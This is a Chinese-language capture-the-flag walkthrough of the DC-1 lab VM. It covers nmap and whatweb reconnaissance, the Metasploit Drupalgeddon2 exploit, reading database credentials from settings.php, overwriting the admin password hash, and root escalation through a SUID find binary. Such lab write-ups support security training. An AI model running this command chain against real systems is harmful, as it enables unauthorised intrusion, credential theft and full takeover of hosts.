将下载好的DC-1解压之后直接用vmware打开
这里我的网络设置用的是nat模式,kali和DC-1用的都是nat
信息搜集:
我的kali所在的网段是
ifconfig
然后扫描192.168.52.0这个网段之内的ip
nmap -sP 192.168.52.0/24
这个就是我们的DC-1所在的ip
我们也可以用另一个工具扫一下
我们可以右键DC-1查看他的mac地址
也可以在本机用浏览器访问那个ip
然后就可以确定需要攻击的ip了
查看他的cms还有相关代码语言等
whatweb -v 192.168.52.130
可以看到他用的cms是Drupal
我们可以去找他的这个cms的历史漏洞,也可以用msf尝试攻击
渗透测试:
-
启动msf
msfconsole
-
查询drupal这个cms的版本漏洞
search drupal
-
利用漏洞POC
里面的多个都可以试一下,我就直接这个靶机要用到的那个 exploit/unix/webapp/drupal_drupalgeddon2了use exploit/unix/webapp/drupal_drupalgeddon2
设置目标ip
set rhosts 192.168.52.130
执行POC
exploit
这样子说明已经拿下了
- 利用shell获取flag之路
shell
然后利用反弹shell提升效率(就是看的舒服一点)
python -c “import pty;pty.spawn(‘/bin/bash’)” 反弹shell
ls查询
发现有个flag1.txt
cat flag1.txt
config这个单词我们可以想到跟设置有关,无论是什么网站或者工具的都有个配置,那里面就有个config文件。所以我们可以搜寻与set相关的
find . -name “set*”
cat ./sites/default/settings.php
里面可以看到数据库的·账号密码
我们可以连接一下
先连接数据库
mysql -udbuser -pR0ck3t
然后进入drupaldb数据库
然后查表
show tables;
然后查users
select * from users \G
然后可以看到admin经过加密后的密码
我们查找下hash的代码,运行一下测试一下
因为他是这样的,输入原始密码->加密后的密码,保存的是加密后的密码
我们把他运行一下
我们给他一个参数123456试一下
原密码->加密后的密码
123456 -> $S$DnRXE5.1dPyEaMm0admiv6w4jEDRYt/3EDT.n8xW0Tp4rUtkVt4
更新admin的密码
访问flag3
这里给了个passwd,我们可以想到/etc/passwd
我们访问一下
cd /etc/passwd
看到个flag4,然后我们可以访问下
提示这个是文件夹,那就去里面找东西
cat flag4.txt
这里提示我们要去到root,那就需要提权
find / -perm -u=s -type f 2>/dev/null
find指令
/根目录
-perm
权限
- u用户(s=特权)
-type 类型
f 文件
2>/dev/null
不显示错误信息
然后用find提权
find /-exec “/bin/bash” -p \;
提权成功
cd /root 去到根目录
ls 查看文件
cat thefinalflag.txt
一些知识点:
1./bin/bash
bash/bin/bash
就比较熟悉了,它是 Bash Shell 的二进制执行文件路径。是 Unix 类操作系统中最常用的 Shell 程序之一。
所以可知这个地方放的应该是个shell,我们去获取他就可以获得shell
2.find提权
-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;,注意{ }和\;之间的空格。
我们在特权里面找到了find
然后用find去获得shell
find / -perm -u=s -type f 2>/dev/null
获取有特权的,然后里面有个find
find /-exec “/bin/bash” -p \;
find找shell
本人也新手,写的差勿喷。自己照着wp做了一遍复现了一遍
在实战中学习